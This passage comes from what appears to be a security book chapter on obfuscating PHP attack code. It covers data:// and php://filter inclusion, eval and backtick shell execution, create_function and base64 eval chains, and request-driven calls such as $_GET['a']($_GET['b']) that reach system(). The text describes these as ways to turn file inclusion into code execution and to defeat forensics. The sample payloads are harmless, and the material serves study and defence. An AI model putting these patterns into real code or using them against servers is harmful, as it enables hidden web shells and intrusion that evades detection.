include ‘php://filter/||/read=//|||//write=/resource=test2.php’;
In the preceding code, we can see that PHP understands file URIs as well as data URIs. But what other protocol handlers are available? As mentioned, we are talking about streams here, which have been available since PHP 5. Streams are meant to provide a large array of possibilities to treat incoming and outgoing data before it's sent or internally processed. Instead of, for example, implementing his own complicated solutions for transferring binary files from application A to application B, a developer can make use of streams and encode the file in base64 to make sure no dangerous characters are put on the wire. Also, the data URI stream handler can be used for urlencoded data or any other format desired.
$h = fopen(‘php://filter/string.rot13|convert.base64-encode/resource=test.php’,‘r’);
print_r(stream_get_contents($h));
The methods for treating the string data can be stacked, as shown in the last example snippet where we first applied ROT13 encoding on the included file and then applied base64 encoding. Note that this would not make any sense in a real-life scenario, but it is possible to do. Also, we can use empty read= or write= directives as well as pipes and slashes for extra obfuscation.
Enabling allow_url_include via the php.ini or.htaccess file should at least be considered twice by developers and server admins, since it opens a whole new world of injection and obfuscation possibilities. Be sure you know whether your server allows URL inclusion if you host important projects. This is especially important where shared servers are concerned. The following link provides more in-depth information about allow_url_include:
You can find a thorough write-up on the php:// stream handler at http://illiweb.com/manuel/php/wrappers.php.html.
As you can see, the inclusion of an existing file containing PHP code via a filter stream is equivalent to a regular include. But what should you do if there is no suitable file to include? Several papers have been published in the past few years explaining more or less reliable methods for getting a file uploaded on the targeted server, but streams provide a more elegant way to do this. It is possible to combine php://-filter with data URI streams, as the next examples show, or just to use data URIs all alone:
<?php
include ‘php://filter/////resource=data://,<?php echo "yay" ?>’;
include ‘data://,<?php echo "yay" ?>’;
include ‘data:///,<?phpinfo();’;
The possibilities for encoding or character-based obfuscation are quite limited here, but at least we can use URL entities and mix upper- and lowercase characters. Only the protocol handler itself cannot be modified, so variations such as d%41ta: or even dAta: will not work at all.
<?php
IncluDe‘data:%2f///,<?php+phPinFo%28);‘;
IncluDe"d\141ta:\x252f///,%\063c?php+phPinFo%28);";
Before we lose ourselves in code evaluation via inclusion and dissecting the stream handlers, let us look at the possibilities PHP provides for evaluating and executing code and how we can use those functions for obfuscation.
Standard methods and backtick notation
The most common function for evaluation (a.k.a. Direct Dynamic Code Evaluation) is, of course, eval(). In PHP, as well as in many other languages, it does nothing more than receive a string as an argument and execute the content of the string as PHP code. If the result of an eval statement needs to be returned to be used as a variable value or something similar, it is possible to use the return inside the string to be evaluated. Everything after the return will be ignored by the parser.
<?php
eval(‘echo 1;’); //1
echo eval(‘return 1;echo 2;’); //1
An injection point inside the string to evaluate can usually bypass the return barrier and make sure that code behind it can be executed as well. The kind of bypass logically depends on the injection point, but either comments, ternary operators, or constructs, as shown in the following code, can help:
<?php
echo eval(‘return 1 && eval("echo 2;");’); //1
echo eval(‘return 0 || eval("echo 2;");’); //1
Of course, it is possible to use entities in double-quoted strings, as shown in previous sections, but there is yet another way to generate strings for eval statements and other tricks. The technique is actually a kind of evaluation, but on the shell layer rather than in PHP itself. It is known as backtick notation, a form of shorthand documented as an execution operator in the PHP docs, 4 and a form of shorthand for the native function shell_exec().
PHP knows several functions capable of passing strings through to the command line. Besides shell_exec(), these functions include exec(), passthru(), and system(), among others. They are documented on the program execution function pages in the PHP docs (see www.php.net/manual/en/ref.exec.php). The main differences between them are their behaviors regarding return values and output display. Using the backtick operator, as mentioned, is equivalent to executing shell_exec(), which makes it particularly interesting in our demand to obfuscate code. Here is a very basic example showing how strings can be generated with this technique:
<?php
echo ‘echo 1'; //1
In the preceding code, PHP executed echo 1 on the shell and returned the received 1 to the echo statement, which results in nothing more than an echo 1. The interesting thing here is the possibility to use shell entities, and thus get a new layer of obfuscation via encoding. Not only can we use PHP entities but we can also use double-encoded representations of characters coming from the shell. Inside backtick operators, no quoting has to be used as long as the canonical form of characters or the octal entity representations are being used. Quotes are required only if hex entities need to be used.
<?php
echo ‘echo \101"\x41"’\x41‘’; // AAAA
echo ‘echo A\101{$unused}"\x41"$unused’\x41‘\n\x\y\z…’; //AAAA
The second snippet shows that undeclared variables are being ignored, and that arbitrary padding is placed at the end of the string. For a forensics researcher, it is now extremely difficult to determine where the actual payload ended and the padding began. Here is an example utilizing this technique, combined with double-quoted string obfuscation:
<?php
eval("echo ‘echo A\101{$unused}\"\x41\"$unused'\x41‘\n\x\y\z…414141’;");
eval("\x65chO\140\x65cho\x20A\101".$_x."\"\x41\"$unused‘\x41’\n\x\y\z!.414141‘;");
eval("/\x2f\x0a\x65chO\140\x65cho\x20A\101".$_x."\"\x41\"$unused‘\x41’\n\x\y\z!.414141’;");
The preceding example also adds the trick of using a one-line comment in combination with an entity for creating a new line, \x0A. We can, of course, use one-line comments as well as block comments.
More eval() alternatives
As mentioned, PHP knows a lot of ways to evaluate strings as actual executable code, and this book does not attempt to enumerate them all. Still, it is worth mentioning call_user_func(), call_user_func_array(), and register_shutdown_function(), which are discussed in detail at the following URLs:
The following example shows how we can use these functions to evaluate strings, with the first parameter controlling what function is to be called and the second parameter controlling the passed arguments:
<?php
register_shutdown_function(‘system’,‘echo 1;’);
call_user_func(‘system’,‘echo 1;’);
call_user_func_array(‘system’,‘echo 1;’);
This combination easily allows us to execute arbitrary code; eval() itself cannot be passed as an argument, but it is easy to get around this limitation via system and the PHP CLI or other tricks. Another commonly abused feature suitable for evaluating arbitrary code is the almost legendary e modifier for the regular expressions used by the PHP function preg_replace() (see www.php.net/manual/en/function.call-user-func-array.php):
<?php
preg_replace(‘//e’, ’eval("echo 1;")’, null);
Lambdas and create_function()
Anonymous functions in PHP are an interesting case to study, since this is one of the very few ways to actually assign functions to variables and work with lambda-like features. Many programming languages feature comparable functionality—among them JavaScript, as well as many functional languages such as Lisp5 and Haskell. 6 Here, we dive into the theoretical background of anonymous functions, and instead we discuss how they are used in PHP to evaluate and obfuscate code.
Anonymous functions in PHP are created with the function create_function(), which accepts two mandatory parameters. The first character is a string of one or more comma-separated arguments for the function to create. The second character is also in string form and represents the actual function body to execute. An example of a very basic anonymous function performing string concatenation for two passed arguments looks like this:
<?php
$a = create_function(‘$a, $b’, ‘return $a.$b;’);
echo $a(‘Hello ’, ‘Goodbye!’); // echoes "Hello Goodbye!"
The first parameter can, of course, also be an empty string, or even null, if no arguments are required. PHP is surprisingly strict regarding the type check in this situation, but as long as nulls or any form of string is being passed, this will work. As the following examples show, this is valid for binary strings, and even when another anonymous function returns a string. And if double quotes are used, all techniques for string obfuscation can be used as well.
<?php
$a = create_function(/**/null, b"\x65cho 1;");
$a();
$b = create_function(create_function(‘’,‘return null;’),b‘echo 1;’);
$b();
The interesting thing about create_function() for obfuscation is that we can infinitely nest one anonymous function to be an argument for another anonymous function, which helps a lot in making code unreadable and hard to analyze. It is the same as endlessly nesting eval chains, enabling us to encode the actual executed string infinitely. The following snippet shows an eval chain used in combination with create_function():
<?php
$a=array();
$a[]=create_function(null,"\x65val(\"\x5cx65cho 1;\");");
$a[0]();
It is also easy to add function calls to base64_decode(), rot13(), or other encoding and decoding functions to the mix. The following example shows a very simple way to use more encoding techniques:
<?php
$a=array();
$a[]=create_function(
null,"eval(base64_decode(‘ZXZhbCgiXHg2NWNobyAxOyIpOw==’));"
);
$a[0]();
Anonymous and variable functions
In addition to working with lambda-like features, anonymous functions also enable us to work with variable functions. In PHP, callbacks and code structuring are based on the new predefined Closure class. This class unfortunately cannot be instantiated directly. Also, serializing anonymous functions either returns the serialized form of the return value or in more complex setups throws a fatal error. Consider the following code to learn how anonymous functions can be used:
<script language="javascript">
$a = function(){return 1;};
alert($a())
</script>
<?php
$a = function(){return 1;};
echo $a();
This feature is perfect for effective code obfuscation since it allows us to spread the business logic that is forming and executing the payload all over the vectors used for an attack. As in JavaScript, it is also possible to nest anonymous functions—mixing them up with the results of create_function() and eval() as well as using curly bracket notation for the label the function is being named with, including the dirty include tricks.
Anonymous functions cannot be used without an actual assignment. JavaScript is far more flexible in this regard, and allows (function(a){})(1), but for better obfuscation, again the superglobals or other variables can be used.
<?php
(function($a){return $a;})(1); // won't work
$_[x]=function($a){return $a;};echo$_[x](1); // works
Still, this feature opens the gate for a whole new set of obfuscation techniques: nesting anonymous functions, combining them with create_function() and the mentioned eval, as well as the huge array of possible string obfuscation techniques enabling an attacker to create almost unreadable code. If the actual payload is again encrypted and can only be decrypted with knowledge of the key hidden in some variable of the $_SERVER array or any other data which is out of band and usually not being logged, it is possible to create vectors that are quite bulletproof against forensic measures, which makes extensive logging unavoidable and requires high levels of intrusion detection and intrusion prevention intelligence to be able to provide a decent protection level. The following example shows a mildly obfuscated but already hard to read representation of an echo 1; using create_function() and anonymous functions, while at the same time playing with the different scopes and the possibility of using same-named variables all over the code:
<?php
${$_=create_function(null,"\$_[x]=fun\x43tion(\$_){return\$_;};\x65cho\$_[x](1);")};$_();
This feature is somewhat similar to the way older PHP variables function in terms of obfuscating code in cases where PHP 5.3 or later is not present on the targeted machine. This feature can be called quirky, if not something worse, and it is easiest to explain with an example:
<?php
function foo() {return 1;}
$foo = ‘foo’;
echo $foo(); // echoes 1
If a string is being assigned and a function with the same name exists in the scope, the string can magically reference the function, and the function can be executed via the variable to the string to which it is mapped. This even works with superglobals, allowing code such as this:
<?php
// called with test.php?a=foo
echo $_GET[‘a’]();
It is even possible to work with native functions and map them to variables via simple string assignment. At the time of this writing, PHP seems to block several functions for access via this technique; eval() fails, as does system_exec(). But system(), for example, works like a charm and allows code snippets such as this to work:
<?php
//called with test.php?a=system&b=echo 1;
$_GET[‘a’]($_GET[‘b’]);
<?php
/*called with test.php?a=sys&b=echo 1;&c=tem*/
$_[]=$_GET[‘a’].$_GET[‘c’];$_[0]($_GET[‘b’]);
This can be considered obfuscation heaven and enables far more complex and quirky examples, especially when combined with the already mentioned obfuscation techniques.
Summary
This chapter did not cover all possible obfuscation techniques available in PHP, because especially in terms of encoding and encryption, the possibilities are endless. However, we did cover basic and advanced string obfuscation patterns, learned how to access and cast superglobals, and saw several ways to execute code with eval() and beyond. In real-life situations, the possibility to use filters and streams for inclusions are particularly interesting, since many Web applications are vulnerable against local file inclusions, which can be easily turned into actual remote code executions with these techniques, while at the same time making detection and forensics extremely hard to accomplish. PHP is not very cooperative here, and it contains a lot of possibilities for creating code that is unreadable but still works.
PHP nevertheless contains far more quirks, bugs, and vulnerabilities which can be useful during an attack to unveil and manipulate data and execute code. PHP 6 might introduce a whole new array of issues and new obfuscation techniques, not only the Unicode support and the enhanced chr() function (see http://php.net/manual/en/function.chr.php). Unicode whitespace might play an important role as well as possibilities to generate ASCII payloads from a Unicode string by harvesting table index information from other characters.
With this discussion of PHP behind us, let us move on to Chapter 7 and see what techniques can be used to obfuscate queries and comparable data in SQL.